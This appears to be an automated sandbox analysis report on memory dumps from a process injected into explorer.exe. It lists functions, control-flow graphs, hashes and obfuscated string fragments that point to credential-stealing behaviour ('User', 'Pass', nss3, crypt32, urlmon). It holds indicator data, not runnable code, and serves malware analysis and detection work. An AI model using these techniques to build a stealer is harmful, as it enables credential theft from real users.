                                                      • Opcode ID: 0ce64f6c5658de80158c81f3cbf096ca4ae3b14cd03aa3827f244d035aa56b44
                                                      • Instruction ID: c7dc53bd4bbe73c9ea4988263346f8eb52ad452903b5d93b45dabb7ffdbde5ce
                                                      • Opcode Fuzzy Hash: 0ce64f6c5658de80158c81f3cbf096ca4ae3b14cd03aa3827f244d035aa56b44
                                                      • Instruction Fuzzy Hash: 00414A30A08A099FC759EFA8E085AD5B3E0FB68300F40462ED5AEC7155DF70AA95CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E07249B Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 e07249b-e07249d 296 e07249f-e0724a0 295->296 297 e0724de 295->297 296->297 298 e072463-e07249a 297->298 299 e0724e0-e0724e3 297->299 300 e0724e5-e0724f0 call e0742f2 299->300 301 e07252d-e07254f call e0734e2 299->301 305 e0724f5-e07252a call e0742c2 300->305 309 e072551-e072557 SleepEx 301->309 310 e072559-e072562 301->310 305->301 309->310 312 e0724d9-e0724dd 310->312 313 e072568-e072571 310->313 312->310 315 e0724df-e0724e2 312->315 316 e072573-e07257a 313->316 317 e0725aa-e0725c6 313->317 315->310 319 e0724e4-e0724eb 315->319 320 e07258f-e072598 316->320 321 e07257c-e07257d 316->321 319->305 324 e0724f0 call e0742f2 319->324 320->317 323 e07259a-e0725a1 320->323 322 e072583-e07258d 321->322 322->320 322->322 323->317 325 e0725a3-e0725a4 323->325 324->305 325->317
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 3ccde394bd70ddecd03c14b6fc24b2595817483b3a08d9bc1dab5663144559a5
                                                      • Instruction ID: 457f3b89a5187968df0aabd2aebe4a8bd6b7747e69f75ad830dd430f6da2806a
                                                      • Opcode Fuzzy Hash: 3ccde394bd70ddecd03c14b6fc24b2595817483b3a08d9bc1dab5663144559a5
                                                      • Instruction Fuzzy Hash: 2E310670628B888FDB24DF18D8856EC73E1FB99710F40461AD4CE87125DE3099428B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06B592 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 326 e06b592-e06b5d6 call e06b012 call e072ea2 331 e06b5dc-e06b5de 326->331 332 e06b678-e06b68c 326->332 333 e06b5e2-e06b5f3 SleepEx 331->333 333->333 334 e06b5f5-e06b607 333->334 335 e06b63d-e06b643 334->335 336 e06b609-e06b60f 334->336 335->333 338 e06b645-e06b64b 335->338 336->335 337 e06b611-e06b626 call e06c002 336->337 337->335 343 e06b628-e06b638 call e06ba42 337->343 338->333 340 e06b64d-e06b653 338->340 340->333 342 e06b655-e06b666 call e06ce12 call e0724a2 340->342 348 e06b66b-e06b673 call e06b3f2 342->348 343->335 348->333
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 2a7dc5752cccead682500119bf899b61bdf793197bd36499a0b1929d9377397b
                                                      • Instruction ID: 533596b12e4faa04651512c816dfc5cd8539a79c8ee6944da30408f92513ba70
                                                      • Opcode Fuzzy Hash: 2a7dc5752cccead682500119bf899b61bdf793197bd36499a0b1929d9377397b
                                                      • Instruction Fuzzy Hash: 3D216D70614A4D8FCB94EF6880D47E9B7E1FB94344F480A7ED85ACB119CB7499418F81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06B68F Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: f8b43746a5dd1e4702be46bc776fd515094d952c59dfdf3c23eeec39d897e405
                                                      • Instruction ID: 62146996ac11bc7e950c84d1815ec7ec63e9058eb75d1e98acac9400e13dd984
                                                      • Opcode Fuzzy Hash: f8b43746a5dd1e4702be46bc776fd515094d952c59dfdf3c23eeec39d897e405
                                                      • Instruction Fuzzy Hash: 2C01F470618A084BCB88EF2CD495ABAB3E0FF9C201F044A3EE84AD7254DE75C9418B45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06B692 Relevance: 1.5, APIs: 1, Instructions: 42threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 1b86da4e730cedba5b0cb7f3df54160fce6270f61d11782c4bb3193c84e210d2
                                                      • Instruction ID: 83a6fc63a53695b9ac40fdc1d907b043c99d03525893596ab3e5c0d285be0984
                                                      • Opcode Fuzzy Hash: 1b86da4e730cedba5b0cb7f3df54160fce6270f61d11782c4bb3193c84e210d2
                                                      • Instruction Fuzzy Hash: 44F0F630618A084FCB48EF2C84846BAB7E0FF9C204F044A3E944ED7254DE34C8408B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 0DFA8282 Relevance: 11.7, Strings: 9, Instructions: 406COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$32.d$K^;$M$S$el32$kern$ll$user
                                                      • API String ID: 0-2375977824
                                                      • Opcode ID: e9345d59fb6634a24453eec543bf7cdd2f46e44b95e67a2b379230e0553d7b89
                                                      • Instruction ID: 4c4f0115af32221d838181cec4df39da19d80a2f2275d7c89e1df3acb5be8ddc
                                                      • Opcode Fuzzy Hash: e9345d59fb6634a24453eec543bf7cdd2f46e44b95e67a2b379230e0553d7b89
                                                      • Instruction Fuzzy Hash: D0E138B0618A499FC759EF3CC884BAAF7E1FB98300F41862A955AC7240DF74E9518B85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFAC98A Relevance: 56.5, Strings: 45, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: 2e95416e82356edc55077046fc5960b15a5376b3d715b2e1edbec4f83265ce62
                                                      • Instruction ID: 423ff2e1a588adbde5480b259797eb1b39584b52715e5ae4b9f0451ccbe7b9c4
                                                      • Opcode Fuzzy Hash: 2e95416e82356edc55077046fc5960b15a5376b3d715b2e1edbec4f83265ce62
                                                      • Instruction Fuzzy Hash: 379152F04482948AC7158F59A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFAC992 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                      • Instruction ID: b7d2422c979b7a35374f90cbe413e65a97916b40a38fbc1e8d59842caf687457
                                                      • Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                      • Instruction Fuzzy Hash: 629143F04482948AC7158F59A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFA8A63 Relevance: 22.7, Strings: 18, Instructions: 155COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2$[32H$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                      • API String ID: 0-228987675
                                                      • Opcode ID: 0ff6bf5303e9a5d37dbf1de5c0faee6b0e0123085f039a129cd1a6130687b116
                                                      • Instruction ID: 1618d875a71532aab024f4ac877ac69f5873f3572ef433a6bac634e71a3f018f
                                                      • Opcode Fuzzy Hash: 0ff6bf5303e9a5d37dbf1de5c0faee6b0e0123085f039a129cd1a6130687b116
                                                      • Instruction Fuzzy Hash: A3418CB0A18B088BDB149F8CE8456BE7AF2FB48744F00425ED449D7241DBB4DD458BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFA8A72 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                      • API String ID: 0-1539916866
                                                      • Opcode ID: 5524e9422ce90cd89ea5a8b31f63b1552e5f142a058918cd25d5ebbf8b83df53
                                                      • Instruction ID: 0fb9288ccd9d2983a31481316820e51c96b51f97b4711ea634b091c529d1a18d
                                                      • Opcode Fuzzy Hash: 5524e9422ce90cd89ea5a8b31f63b1552e5f142a058918cd25d5ebbf8b83df53
                                                      • Instruction Fuzzy Hash: D0417DB0A18B088BDB149F8CE8456BD7BF6FB48744F00415ED409D7241DBB5DD458BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFA9E5F Relevance: 9.0, Strings: 7, Instructions: 293COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                      • API String ID: 0-2058692283
                                                      • Opcode ID: 304d45be7e6ff470f36732f5bd31357d487670a62731f2884c5cb1e30413cffa
                                                      • Instruction ID: 908b598ce629d50ad1e635cbed47e9282ee8ee0b34b21410ffc8514c7998225e
                                                      • Opcode Fuzzy Hash: 304d45be7e6ff470f36732f5bd31357d487670a62731f2884c5cb1e30413cffa
                                                      • Instruction Fuzzy Hash: E0919070A187488BDB19EF6C98446EEB7E1FF88300F40862ED58AD7251EF74D9458B89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFA9E62 Relevance: 9.0, Strings: 7, Instructions: 292COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                      • API String ID: 0-2058692283
                                                      • Opcode ID: e1013a74425b57d7bd08c9839565c84701022d368202b89925ad8b38b1a9bcb7
                                                      • Instruction ID: 869a37e4cc9e4ed8017ccac4fd55ea8d0bbb8f70a2cee075542d92694a8b4aa1
                                                      • Opcode Fuzzy Hash: e1013a74425b57d7bd08c9839565c84701022d368202b89925ad8b38b1a9bcb7
                                                      • Instruction Fuzzy Hash: EE919F70A1C7488BDB19EF6C98446EEB7E1FF88300F40862ED58AD7251EF74D9458B89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFA77E2 Relevance: 8.9, Strings: 7, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2.dl$dll$l32.$ole3$shel${E768CD3B-BDDC-436D-9C13-E1B39CA257B1}$~7?
                                                      • API String ID: 0-955528833
                                                      • Opcode ID: 58c875bc74ccdc815e9d34109d13b40461173b3e5a6b3bed2929fb1bf1bb57f3
                                                      • Instruction ID: 13d7a85379eecff13bce9172f9cbeabe5ac116538129abb3bf552ea35890de6b
                                                      • Opcode Fuzzy Hash: 58c875bc74ccdc815e9d34109d13b40461173b3e5a6b3bed2929fb1bf1bb57f3
                                                      • Instruction Fuzzy Hash: EC616F70A18B4C8FDB55EFA8C445ADBB7F1FF58300F418A2E948AE7214EF3095458B85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFA8BF2 Relevance: 7.7, Strings: 6, Instructions: 164COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: U$b$d$k$n$o
                                                      • API String ID: 0-1739295752
                                                      • Opcode ID: 0178c01fcb177579754c1ad8938b66705a4776a862c0f9c0c19bfce4c80ca1b0
                                                      • Instruction ID: 348bc813fd3251234265120aa173e4f0b1329fa63d929d170b9293424c88e490
                                                      • Opcode Fuzzy Hash: 0178c01fcb177579754c1ad8938b66705a4776a862c0f9c0c19bfce4c80ca1b0
                                                      • Instruction Fuzzy Hash: CA519370A14A0D9BDB19EFA8C8447EEB3B1FF58301F40862AD51AD7241EF74D9498BC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFAA1C2 Relevance: 6.5, Strings: 5, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$cryp$dll$nss3$t32.
                                                      • API String ID: 0-1478216402
                                                      • Opcode ID: 0169f7b802fbb1d511129958565f0d33081779a2ccd259364c899bcee853e98e
                                                      • Instruction ID: f26fc5f89d651455ef5baf2fd9c6a07871109b8e04fe462dcbee401b56556fb0
                                                      • Opcode Fuzzy Hash: 0169f7b802fbb1d511129958565f0d33081779a2ccd259364c899bcee853e98e
                                                      • Instruction Fuzzy Hash: FC713E70A18B0A9FDB55EF6CC4487EAB3E1FF18700F40862AA84AC7254DB75E958C7C5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFAA462 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -Age$User$nt: $on.d$urlm
                                                      • API String ID: 0-1987325725
                                                      • Opcode ID: 8e9652e3147b6c8586b737b101cb5b85868f5ee2c2efdf647ebb5e9b2206844b
                                                      • Instruction ID: 8a07a2fe81dafcdca9b5f4247495839014c217ee47e5f31c63c2a56c59315ad8
                                                      • Opcode Fuzzy Hash: 8e9652e3147b6c8586b737b101cb5b85868f5ee2c2efdf647ebb5e9b2206844b
                                                      • Instruction Fuzzy Hash: 4131B331B18A4C8FCB15EFADC8846EEB7E0FB58215F45822AD54ED7241DF78CA488785
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0DFA8002 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825087419.000000000DF30000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DF30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_df30000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$el32$h$kern
                                                      • API String ID: 0-4264704552
                                                      • Opcode ID: 1cfba8eece95ef1f00e4502c07e19196f306f108af11150618461b52a641cece
                                                      • Instruction ID: f739d2f4b3d02b6620e5f4610dc383a0413af973bd061128deeebf724a80d768
                                                      • Opcode Fuzzy Hash: 1cfba8eece95ef1f00e4502c07e19196f306f108af11150618461b52a641cece
                                                      • Instruction Fuzzy Hash: 4B4184B0A0CB488FD7A8DF2C84883AAB7E1FB98340F14867E959EC3255DB70C545CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%